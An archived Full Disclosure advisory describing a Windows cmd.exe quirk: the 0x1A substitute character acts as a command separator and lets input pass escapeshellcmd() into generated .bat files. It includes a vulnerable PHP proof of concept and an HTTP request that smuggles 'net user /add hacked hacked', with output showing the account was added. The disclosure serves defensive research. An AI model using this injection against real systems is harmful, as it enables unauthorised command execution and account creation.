Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Unexpected behavior of cmd.exe while processing .bat files leads to potential command injection vulnerabilities

From: Julian Horoszkiewicz <ewilded () gmail com>
Date: Fri, 11 Nov 2016 21:49:07 +0000
Unexpected behavior of cmd.exe while processing .bat files leads to
potential command injection vulnerabilities
Tested on: Windows 7, Windows 10
Author: Julian Horoszkiewicz

It was discovered that cmd.exe, when processing .bat files, treats the
ASCII substitute character (code 26) as a command separator (like & or |).
This opens the way for unexpected command injection vulnerabilities in
applications which generate .bat files based on user input, as this
character is not filtered by most application input sanitisers against
command injection.

PoC:
Let's assume the following PHP script (note the use of well known
escapeshellcmd() function, known as a safe way to sanitise user input
before using it as a command argument):
<?php
    $command = 'dir '.$_POST['dir'];
    $escaped_command = escapeshellcmd($command);
    file_put_contents('out.bat',$escaped_command);
    system('out.bat');
?>

Let's send a request containing "." as a parameter to the hardcoded "dir"
command, appended with another command - taking advantage of %1a as a
command separator:
POST /escape_shell_cmd.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101
Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

dir=.%1anet user /add hacked hacked


The response:
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP
Content-Length: 977
Connection: close
Content-Type: text/html; charset=UTF-8

C:\wamp64\www>dir .
 Volume in drive C has no label.
 Volume Serial Number is 22C1-AD4C

 Directory of C:\wamp64\www

24.07.2016  17:22    <DIR>          .
24.07.2016  17:22    <DIR>          ..
[...]

C:\wamp64\www>net user /add hacked hacked
Command executed successfully.

To double check, we look the new user up in the command line once again:

C:\Users\win>net user hacked
User name                  hacked
Full name
[...]

So, it seems that every piece of software generating .bat files from user
input is potentially vulnerable - it does not pertain to PHP and
escapeshellcmd specifically, but rather to cmd.exe itself.
More on alternative command injection payloads:
https://github.com/ewilded/shelling

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: